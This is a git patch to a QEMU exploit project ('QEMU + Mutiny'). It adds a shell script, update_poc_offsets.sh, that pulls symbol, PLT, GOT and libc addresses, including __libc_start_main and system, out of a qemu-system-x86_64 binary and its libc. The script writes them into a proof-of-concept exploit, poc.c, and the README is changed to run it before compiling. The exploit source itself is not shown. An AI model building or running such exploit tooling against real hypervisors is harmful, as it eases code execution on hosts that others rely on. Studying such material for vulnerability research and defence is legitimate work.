From 309c95981c1123074b6645933cb51bc7d579dd8a Mon Sep 17 00:00:00 2001 From: stong Date: Sat, 16 May 2026 05:03:00 +0900 Subject: [PATCH] EVEN MORE UISER FRIENDLY!!! --- qemu/README.md | 5 ++++ qemu/update_poc_offsets.sh | 51 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 56 insertions(+) create mode 100755 qemu/update_poc_offsets.sh diff --git a/qemu/README.md b/qemu/README.md index 115713a..4b53628 100644 --- a/qemu/README.md +++ b/qemu/README.md @@ -35,6 +35,10 @@ QEMU + Mutiny. ## Offsets (USER FRIENDLY VERSION) +``` +./update_poc_offsets.sh +``` + - Replace `0x047E735` with `$(readelf -s qemu-system-x86_64 | grep cmd_logs_get_log | awk '{print $2}')` - Replace `0x0341BB0` with `$(objdump -S qemu-system-x86_64 | grep ":" | awk '{print $1}')` - Replace `0x01E72FF8` with `$(objdump -S qemu-system-x86_64 | grep "libc_start_main" | awk '{print $(NF-1)}')` @@ -45,6 +49,7 @@ QEMU + Mutiny. ## Building ``` +./update_poc_offsets.sh gcc -O2 -Wall -Wextra -o exp poc.c ``` diff --git a/qemu/update_poc_offsets.sh b/qemu/update_poc_offsets.sh new file mode 100755 index 0000000..ff6cd2f --- /dev/null +++ b/qemu/update_poc_offsets.sh @@ -0,0 +1,51 @@ +#!/bin/sh +set -eu + +POC=${1:-poc.c} + +echo "[*] finding cmd_logs_get_log..." +cmd_logs_get_log=$(readelf -s qemu-system-x86_64 | grep cmd_logs_get_log | awk '{print $2}') +echo "[+] cmd_logs_get_log: $(printf '0x%s' "$cmd_logs_get_log")" + +echo "[*] finding memmove@plt..." +memmove_plt=$(objdump -S -j .plt.sec qemu-system-x86_64 | grep ":" | awk '{print $1}') +echo "[+] memmove@plt: $(printf '0x%s' "$memmove_plt")" + +echo "[*] finding __libc_start_main@got..." +libc_start_main_got=$(objdump -S qemu-system-x86_64 | grep "libc_start_main" | awk '{print $(NF-1)}') +echo "[+] __libc_start_main@got: $(printf '0x%s' "$libc_start_main_got")" + +echo "[*] finding libc..." +libc_line=$(ldd ./qemu-system-x86_64 | grep libc.so | awk '{print $3}') +echo "[+] libc: $libc_line" + +echo "[*] finding __libc_start_main..." +libc_start_main=$(readelf -sW $libc_line | grep -i __libc_start_main | awk '{print $2}') +echo "[+] __libc_start_main: $(printf '0x%s' "$libc_start_main")" + +echo "[*] finding system..." +system=$(readelf -sW $libc_line | grep -i system@ | awk '{print $2}') +echo "[+] system: $(printf '0x%s' "$system")" + +hexlit() +{ + printf '0x%s\n' "$1" +} + +replace() +{ + old=$1 + new=$2 + + tmp="$POC.tmp.$$" + sed "s/$old/$new/g" "$POC" > "$tmp" + mv "$tmp" "$POC" +} + +echo "[*] updating $POC..." +replace 047E735 $cmd_logs_get_log +replace 0341BB0 $memmove_plt +replace 01E72FF8 $libc_start_main_got +replace 2A200 $libc_start_main +replace 058750 $system +echo "[+] done"